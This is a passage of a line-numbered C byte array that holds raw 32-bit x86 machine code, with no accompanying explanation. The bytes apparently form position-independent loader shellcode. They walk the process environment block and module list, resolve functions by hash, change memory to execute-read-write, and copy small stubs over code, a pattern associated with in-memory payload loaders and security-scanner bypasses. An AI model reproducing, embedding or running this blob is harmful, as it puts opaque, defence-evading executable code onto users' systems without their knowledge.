1635 0x0c, 0x8b, 0x00, 0x8b, 0x40, 0x38, 0x8b, 0x55, 0x08, 0x8b, 0x52, 0x0c,
1636 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08,
1637 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0xfd, 0xff, 0xff, 0xff,
1638 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0xb8, 0x00, 0x00, 0x00,
1639 0x00, 0xc9, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1640 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1641 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1642 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1643 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1644 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1645 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1646 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1647 0x80, 0x5d, 0xc2, 0x10, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1648 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1649 0x80, 0x5d, 0xc2, 0x14, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1650 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x18, 0x8b,
1651 0x45, 0x08, 0x8b, 0x40, 0x14, 0x8b, 0x40, 0x44, 0x8b, 0x55, 0x0c, 0x89,
1652 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xb8, 0x00, 0x00, 0x00, 0x00,
1653 0xc9, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80,
1654 0x5d, 0xc2, 0x0c, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80,
1655 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80,
1656 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80,
1657 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x8b, 0x45, 0x1c, 0xc7, 0x00,
1658 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc2, 0x18,
1659 0x00, 0x55, 0x89, 0xe5, 0x8b, 0x45, 0x08, 0x0f, 0xaf, 0x45, 0x0c, 0x5d,
1660 0xc3, 0x55, 0x89, 0xe5, 0x8b, 0x45, 0x18, 0xc7, 0x00, 0x00, 0x00, 0x00,
1661 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc2, 0x14, 0x00, 0x55, 0x89,
1662 0xe5, 0x8b, 0x55, 0x08, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x5d, 0xc3, 0x55,
1663 0x89, 0xe5, 0x83, 0xec, 0x58, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xfc, 0x01,
1664 0x00, 0x00, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x89, 0x45, 0xf4, 0x8b,
1665 0x45, 0x08, 0x05, 0x28, 0x03, 0x00, 0x00, 0x89, 0x44, 0x24, 0x04, 0x8b,
1666 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xa2, 0xbf, 0xff, 0xff, 0x89, 0x45,
1667 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00,
1668 0xe9, 0x02, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x05, 0x9c, 0x05, 0x00,
1669 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24,
1670 0x08, 0x8b, 0x45, 0xf0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89,
1671 0x04, 0x24, 0xe8, 0x10, 0xbd, 0xff, 0xff, 0x89, 0x45, 0xec, 0x83, 0x7d,
1672 0xec, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc9, 0x01,
1673 0x00, 0x00, 0xb8, 0x89, 0x5d, 0x40, 0x00, 0xba, 0x74, 0x5d, 0x40, 0x00,
1674 0x29, 0xd0, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8, 0x85, 0xc0, 0x79, 0x0a,
1675 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa9, 0x01, 0x00, 0x00, 0x8b, 0x45,
1676 0xec, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0xe8, 0x89, 0x45, 0xd8, 0x8b, 0x45,
1677 0xf4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x45, 0xe0, 0x89, 0x44, 0x24, 0x10,
1678 0xc7, 0x44, 0x24, 0x0c, 0x40, 0x00, 0x00, 0x00, 0x8d, 0x45, 0xd8, 0x89,
1679 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd4, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04,
1680 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd4, 0x0b, 0x00, 0x00, 0x89, 0x45,
1681 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x79, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00,
1682 0xe9, 0x5a, 0x01, 0x00, 0x00, 0xe8, 0x6e, 0x02, 0x00, 0x00, 0xba, 0x74,
1683 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1684 0x8b, 0x45, 0xe8, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b,
1685 0x45, 0xec, 0x89, 0x04, 0x24, 0xe8, 0x90, 0x05, 0x00, 0x00, 0x8b, 0x45,
1686 0xe0, 0x8b, 0x55, 0xf4, 0x89, 0x54, 0x24, 0x14, 0x8d, 0x55, 0xdc, 0x89,
1687 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x0c, 0x8d, 0x45, 0xd8, 0x89, 0x44,
1688 0x24, 0x08, 0x8d, 0x45, 0xd4, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24,
1689 0xff, 0xff, 0xff, 0xff, 0xe8, 0x69, 0x0b, 0x00, 0x00, 0x8b, 0x45, 0x08,
1690 0x05, 0xac, 0x05, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00,
1691 0x00, 0x89, 0x44, 0x24, 0x08, 0x8b, 0x45, 0xf0, 0x89, 0x44, 0x24, 0x04,
1692 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x10, 0xbc, 0xff, 0xff, 0x89,
1693 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
1694 0x00, 0xe9, 0xc9, 0x00, 0x00, 0x00, 0xb8, 0xaa, 0x5d, 0x40, 0x00, 0xba,
1695 0x95, 0x5d, 0x40, 0x00, 0x29, 0xd0, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8,
1696 0x85, 0xc0, 0x79, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa9, 0x00,
1697 0x00, 0x00, 0x8b, 0x45, 0xec, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0xe8, 0x89,
1698 0x45, 0xd8, 0x8b, 0x45, 0xf4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x45, 0xe0,
1699 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0x40, 0x00, 0x00, 0x00,
1700 0x8d, 0x45, 0xd8, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd4, 0x89, 0x44,
1701 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd4, 0x0a,
1702 0x00, 0x00, 0x89, 0x45, 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x79, 0x07, 0xb8,
1703 0x00, 0x00, 0x00, 0x00, 0xeb, 0x5d, 0xe8, 0x71, 0x01, 0x00, 0x00, 0xba,
1704 0x95, 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1705 0xc2, 0x8b, 0x45, 0xe8, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04,
1706 0x8b, 0x45, 0xec, 0x89, 0x04, 0x24, 0xe8, 0x93, 0x04, 0x00, 0x00, 0x8b,
1707 0x45, 0xe0, 0x8b, 0x55, 0xf4, 0x89, 0x54, 0x24, 0x14, 0x8d, 0x55, 0xdc,
1708 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x0c, 0x8d, 0x45, 0xd8, 0x89,
1709 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd4, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04,
1710 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x6c, 0x0a, 0x00, 0x00, 0xb8, 0x01,
1711 0x00, 0x00, 0x00, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x00, 0x00,
1712 0x00, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x48, 0x8b, 0x45, 0x08,
1713 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00,
1714 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x08, 0x05, 0x3c, 0x03, 0x00, 0x00, 0x89,
1715 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x52, 0xbd,
1716 0xff, 0xff, 0x89, 0x45, 0xf0, 0x8b, 0x45, 0x08, 0x05, 0xbc, 0x05, 0x00,
1717 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24,
1718 0x08, 0x8b, 0x45, 0xf0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89,
1719 0x04, 0x24, 0xe8, 0xd0, 0xba, 0xff, 0xff, 0x89, 0x45, 0xec, 0x83, 0x7d,
1720 0xec, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa0, 0x00,
1721 0x00, 0x00, 0x8b, 0x45, 0xec, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xdc, 0x04,
1722 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x45,
1723 0xe4, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0x40, 0x00, 0x00,
1724 0x00, 0x8d, 0x45, 0xdc, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd8, 0x89,
1725 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xb3,
1726 0x09, 0x00, 0x00, 0x89, 0x45, 0xe8, 0x83, 0x7d, 0xe8, 0x00, 0x79, 0x07,
1727 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x53, 0x8b, 0x45, 0x08, 0x05, 0xe1,
1728 0x05, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x04, 0x00, 0x00, 0x00, 0x89,
1729 0x44, 0x24, 0x04, 0x8b, 0x45, 0xec, 0x89, 0x04, 0x24, 0xe8, 0x7c, 0x03,
1730 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x55, 0xf4, 0x89, 0x54, 0x24, 0x14,
1731 0x8d, 0x55, 0xe0, 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x0c, 0x8d,
1732 0x45, 0xdc, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd8, 0x89, 0x44, 0x24,
1733 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x55, 0x09, 0x00,
1734 0x00, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xc9, 0xc3, 0xe8, 0x00, 0x00, 0x00,
1735 0x00, 0x58, 0x83, 0xe8, 0x05, 0xc3, 0x90, 0x90, 0x55, 0x89, 0xe5, 0x83,
1736 0xec, 0x10, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x0c, 0x8d, 0x48, 0xff, 0x8b,
1737 0x55, 0x08, 0x89, 0x4a, 0x0c, 0x85, 0xc0, 0x75, 0x23, 0x8b, 0x45, 0x08,
1738 0x8b, 0x00, 0x8d, 0x48, 0x01, 0x8b, 0x55, 0x08, 0x89, 0x0a, 0x0f, 0xb6,
1739 0x00, 0x0f, 0xb6, 0xd0, 0x8b, 0x45, 0x08, 0x89, 0x50, 0x08, 0x8b, 0x45,
1740 0x08, 0xc7, 0x40, 0x0c, 0x07, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
1741 0x40, 0x08, 0xc1, 0xe8, 0x07, 0x83, 0xe0, 0x01, 0x89, 0x45, 0xfc, 0x8b,
1742 0x45, 0x08, 0x8b, 0x40, 0x08, 0x8d, 0x14, 0x00, 0x8b, 0x45, 0x08, 0x89,
1743 0x50, 0x08, 0x8b, 0x45, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x83,
1744 0xec, 0x14, 0xc7, 0x45, 0xf8, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf8,
1745 0x8d, 0x1c, 0x00, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x82, 0xff,
1746 0xff, 0xff, 0x01, 0xd8, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0x08, 0x89, 0x04,
1747 0x24, 0xe8, 0x72, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x75, 0xdb, 0x8b, 0x45,
1748 0xf8, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x83, 0xec,
1749 0x34, 0x8b, 0x45, 0x08, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0x0c, 0x89, 0x45,
1750 0xd8, 0xc7, 0x45, 0xe0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0xff,
1751 0xff, 0xff, 0xff, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45,
1752 0xe8, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xd4, 0x8d, 0x42, 0x01, 0x89,
1753 0x45, 0xd4, 0x8b, 0x45, 0xd8, 0x8d, 0x48, 0x01, 0x89, 0x4d, 0xd8, 0x0f,
1754 0xb6, 0x12, 0x88, 0x10, 0xe9, 0x0f, 0x02, 0x00, 0x00, 0x8d, 0x45, 0xd4,
1755 0x89, 0x04, 0x24, 0xe8, 0x10, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84,
1756 0xde, 0x01, 0x00, 0x00, 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24, 0xe8, 0xfd,
1757 0xfe, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0xe3, 0x00, 0x00, 0x00, 0x8d,
1758 0x45, 0xd4, 0x89, 0x04, 0x24, 0xe8, 0xea, 0xfe, 0xff, 0xff, 0x85, 0xc0,
1759 0x74, 0x6b, 0xc7, 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xe4,
1760 0x04, 0x00, 0x00, 0x00, 0xeb, 0x1a, 0x8b, 0x45, 0xf8, 0x8d, 0x1c, 0x00,
1761 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24, 0xe8, 0xc5, 0xfe, 0xff, 0xff, 0x01,
1762 0xd8, 0x89, 0x45, 0xf8, 0x83, 0x6d, 0xe4, 0x01, 0x83, 0x7d, 0xe4, 0x00,
1763 0x75, 0xe0, 0x83, 0x7d, 0xf8, 0x00, 0x74, 0x1d, 0x8b, 0x55, 0xd8, 0x8b,
1764 0x45, 0xf8, 0xf7, 0xd8, 0x01, 0xc2, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12,
1765 0x88, 0x10, 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xd8, 0xeb,
1766 0x0c, 0x8b, 0x45, 0xd8, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xd8, 0xc6, 0x00,
1767 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x6f, 0x01, 0x00,
1768 0x00, 0x8b, 0x45, 0xd4, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xd4, 0x0f, 0xb6,
1769 0x00, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xf8, 0x83, 0xe0,
1770 0x01, 0x83, 0xc0, 0x02, 0x89, 0x45, 0xf4, 0xd1, 0x6d, 0xf8, 0x83, 0x7d,
1771 0xf8, 0x00, 0x74, 0x29, 0xeb, 0x1f, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf8,
1772 0xf7, 0xd8, 0x01, 0xc2, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10,
1773 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xd8, 0x83, 0x6d, 0xf4,
1774 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0xdb, 0xeb, 0x07, 0xc7, 0x45, 0xe8,
1775 0x01, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf8, 0x89, 0x45, 0xf0, 0xc7, 0x45,
1776 0xec, 0x01, 0x00, 0x00, 0x00, 0xe9, 0x06, 0x01, 0x00, 0x00, 0x8d, 0x45,
1777 0xd4, 0x89, 0x04, 0x24, 0xe8, 0x66, 0xfe, 0xff, 0xff, 0x89, 0x45, 0xf8,
1778 0x83, 0x7d, 0xec, 0x00, 0x75, 0x46, 0x83, 0x7d, 0xf8, 0x02, 0x75, 0x40,
1779 0x8b, 0x45, 0xf0, 0x89, 0x45, 0xf8, 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24,
1780 0xe8, 0x46, 0xfe, 0xff, 0xff, 0x89, 0x45, 0xf4, 0xeb, 0x1f, 0x8b, 0x55,
1781 0xd8, 0x8b, 0x45, 0xf8, 0xf7, 0xd8, 0x01, 0xc2, 0x8b, 0x45, 0xd8, 0x0f,
1782 0xb6, 0x12, 0x88, 0x10, 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0x45,
1783 0xd8, 0x83, 0x6d, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0xdb, 0xe9,
1784 0x85, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x06, 0x83, 0x6d,
1785 0xf8, 0x03, 0xeb, 0x04, 0x83, 0x6d, 0xf8, 0x02, 0xc1, 0x65, 0xf8, 0x08,
1786 0x8b, 0x45, 0xd4, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xd4, 0x0f, 0xb6, 0x00,
1787 0x0f, 0xb6, 0xc0, 0x01, 0x45, 0xf8, 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24,
1788 0xe8, 0xe6, 0xfd, 0xff, 0xff, 0x89, 0x45, 0xf4, 0x81, 0x7d, 0xf8, 0xff,
1789 0x7c, 0x00, 0x00, 0x76, 0x04, 0x83, 0x45, 0xf4, 0x01, 0x81, 0x7d, 0xf8,
1790 0xff, 0x04, 0x00, 0x00, 0x76, 0x04, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d,
1791 0xf8, 0x7f, 0x77, 0x25, 0x83, 0x45, 0xf4, 0x02, 0xeb, 0x1f, 0x8b, 0x55,
1792 0xd8, 0x8b, 0x45, 0xf8, 0xf7, 0xd8, 0x01, 0xc2, 0x8b, 0x45, 0xd8, 0x0f,
1793 0xb6, 0x12, 0x88, 0x10, 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0x45,
1794 0xd8, 0x83, 0x6d, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0xdb, 0x8b,
1795 0x45, 0xf8, 0x89, 0x45, 0xf0, 0xc7, 0x45, 0xec, 0x01, 0x00, 0x00, 0x00,
1796 0xeb, 0x1e, 0x8b, 0x55, 0xd4, 0x8d, 0x42, 0x01, 0x89, 0x45, 0xd4, 0x8b,
1797 0x45, 0xd8, 0x8d, 0x48, 0x01, 0x89, 0x4d, 0xd8, 0x0f, 0xb6, 0x12, 0x88,
1798 0x10, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xe8, 0x00,
1799 0x0f, 0x84, 0xe7, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0xd8, 0x2b, 0x45, 0x0c,
1800 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x90, 0x90, 0x90, 0x55, 0x89, 0xe5, 0x83,
1801 0xec, 0x10, 0x8b, 0x45, 0x08, 0x89, 0x45, 0xfc, 0xeb, 0x0e, 0x8b, 0x45,
1802 0x0c, 0x89, 0xc2, 0x8b, 0x45, 0xfc, 0x88, 0x10, 0x83, 0x45, 0xfc, 0x01,
1803 0x8b, 0x45, 0x10, 0x8d, 0x50, 0xff, 0x89, 0x55, 0x10, 0x85, 0xc0, 0x75,
1804 0xe5, 0x8b, 0x45, 0x08, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10,
1805 0x8b, 0x45, 0x08, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xf8,
1806 0xeb, 0x13, 0x8b, 0x45, 0xf8, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xfc, 0x88,
1807 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x45, 0xf8, 0x01, 0x8b, 0x45, 0x10,
1808 0x8d, 0x50, 0xff, 0x89, 0x55, 0x10, 0x85, 0xc0, 0x75, 0xe0, 0x8b, 0x45,
1809 0x08, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x56, 0x53, 0x8b, 0x5d, 0x08, 0x8b,
1810 0x75, 0x0c, 0xeb, 0x32, 0x89, 0xd8, 0x8d, 0x58, 0x01, 0x0f, 0xb6, 0x10,
1811 0x89, 0xf0, 0x8d, 0x70, 0x01, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x74, 0x1e,
1812 0x8d, 0x43, 0xff, 0x0f, 0xb6, 0x10, 0x8d, 0x46, 0xff, 0x0f, 0xb6, 0x00,
1813 0x38, 0xc2, 0x73, 0x07, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xeb, 0x19, 0xb8,
1814 0x01, 0x00, 0x00, 0x00, 0xeb, 0x12, 0x8b, 0x45, 0x10, 0x8d, 0x50, 0xff,
1815 0x89, 0x55, 0x10, 0x85, 0xc0, 0x75, 0xc1, 0xb8, 0x00, 0x00, 0x00, 0x00,
1816 0x5b, 0x5e, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0xeb, 0x1f, 0x8b, 0x45, 0x08,
1817 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x74,
1818 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2a, 0x83, 0x45, 0x08, 0x01,
1819 0x83, 0x45, 0x0c, 0x01, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1820 0x74, 0x0a, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xcd,
1821 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x0f, 0x94, 0xc0, 0x0f,
1822 0xb6, 0xc0, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x08, 0xeb, 0x2f,
1823 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00,
1824 0x38, 0xc2, 0x75, 0x1b, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x8b,
1825 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x8e, 0xff, 0xff, 0xff, 0x85, 0xc0,
1826 0x74, 0x05, 0x8b, 0x45, 0x08, 0xeb, 0x13, 0x83, 0x45, 0x08, 0x01, 0x8b,
1827 0x45, 0x08, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc7, 0xb8, 0x00, 0x00,
1828 0x00, 0x00, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0xeb, 0x18, 0x8b, 0x45, 0x08,
1829 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x75,
1830 0x1e, 0x83, 0x45, 0x08, 0x01, 0x83, 0x45, 0x0c, 0x01, 0x8b, 0x45, 0x08,
1831 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x0d, 0x8b, 0x45, 0x0c, 0x0f, 0xb6,
1832 0x00, 0x84, 0xc0, 0x75, 0xd4, 0xeb, 0x01, 0x90, 0x8b, 0x45, 0x08, 0x0f,
1833 0xb6, 0x00, 0x0f, 0xbe, 0xd0, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x0f,
1834 0xbe, 0xc8, 0x89, 0xd0, 0x29, 0xc8, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0xeb,
1835 0x27, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2,
1836 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x38, 0xc2, 0x74,
1837 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2a, 0x83, 0x45, 0x08, 0x01,
1838 0x83, 0x45, 0x0c, 0x01, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1839 0x74, 0x0a, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc5,
1840 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x0f, 0x94, 0xc0, 0x0f,
1841 0xb6, 0xc0, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0xc7, 0x45,
1842 0xfc, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf8, 0x05, 0x05, 0xc2, 0x26,
1843 0xeb, 0x24, 0x8b, 0x45, 0xfc, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xfc, 0x8b,
1844 0x55, 0x08, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x66, 0x89, 0x45, 0xf6, 0x0f,
1845 0xb7, 0x55, 0xf6, 0x8b, 0x45, 0xf8, 0xc1, 0xc8, 0x08, 0x01, 0xd0, 0x31,
1846 0x45, 0xf8, 0x8b, 0x55, 0x08, 0x8b, 0x45, 0xfc, 0x01, 0xd0, 0x0f, 0xb6,
1847 0x00, 0x84, 0xc0, 0x75, 0xcd, 0x8b, 0x45, 0xf8, 0xc9, 0xc3, 0x55, 0x89,
1848 0xe5, 0x53, 0x83, 0xec, 0x64, 0x8b, 0x45, 0x08, 0x8b, 0x00, 0x85, 0xc0,
1849 0x74, 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0xe1, 0x02, 0x00, 0x00,
1850 0xc7, 0x45, 0xac, 0x30, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xac, 0x64, 0x8b,
1851 0x00, 0x89, 0x45, 0xa8, 0x8b, 0x45, 0xa8, 0x89, 0x45, 0xdc, 0x8b, 0x45,
1852 0xdc, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xf8, 0x00, 0x00,
1853 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd8,
1854 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xf0, 0xe9, 0x82, 0x00, 0x00, 0x00, 0x8b,
1855 0x45, 0xf0, 0x8b, 0x40, 0x18, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x89,
1856 0x45, 0xd4, 0x8b, 0x45, 0xd4, 0x8b, 0x40, 0x3c, 0x89, 0xc2, 0x8b, 0x45,
